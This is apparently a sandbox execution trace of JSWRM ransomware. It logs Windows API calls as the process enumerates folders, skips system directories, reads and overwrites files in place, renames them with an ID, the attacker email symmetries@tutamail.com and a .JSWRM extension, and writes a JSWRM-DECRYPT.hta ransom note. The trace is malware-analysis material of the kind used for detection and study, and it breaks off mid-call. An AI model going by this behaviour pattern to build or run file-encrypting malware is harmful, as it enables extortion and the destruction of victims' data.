(lpString1="LocalizedData.xml", lpString2="..") returned 1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0060.224] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0060.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0060.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.225] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.225] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=60816) returned 1 [0060.225] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xed90) returned 0x2471a8 [0060.225] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xed90, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0xed90, lpOverlapped=0x0) returned 1 [0060.259] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.259] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0xed90, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0xed90, lpOverlapped=0x0) returned 1 [0060.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.260] CloseHandle (hObject=0x3d4) returned 1 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0060.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0060.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0060.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0060.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.261] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.262] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0060.262] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0060.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0060.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.262] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0060.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0060.263] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.263] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.263] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="3082", cAlternateFileName="")) returned 1 [0060.263] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="...") returned 1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="recovery") returned -1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="perflogs") returned -1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="documents and settings") returned -1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="$RECYCLE.BIN") returned 1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="system volume information") returned -1 [0060.263] lstrcmpiW (lpString1="3082", lpString2="msocache") returned -1 [0060.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0060.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0060.263] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3082\\jswrm-decrypt.hta")) returned 0xffffffff [0060.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0060.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0060.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0060.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0060.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0060.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0060.265] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3082\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.266] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.266] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.267] CloseHandle (hObject=0x450) returned 1 [0060.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0060.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0060.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0060.268] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\3082\\jswrm-decrypt.hta")) returned 0x20 [0060.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0060.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.268] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3082\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a963eb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0060.268] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.268] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a963eb2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0060.268] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.268] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.268] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbfd, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0060.268] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0060.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0060.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0060.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0060.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0060.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0060.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0060.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0060.269] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.269] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3069) returned 1 [0060.269] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbf0) returned 0x23dc88 [0060.269] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xbf0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xbf0, lpOverlapped=0x0) returned 1 [0060.271] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.271] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xbf0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xbf0, lpOverlapped=0x0) returned 1 [0060.271] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0060.271] CloseHandle (hObject=0x3d4) returned 1 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.272] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0060.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) 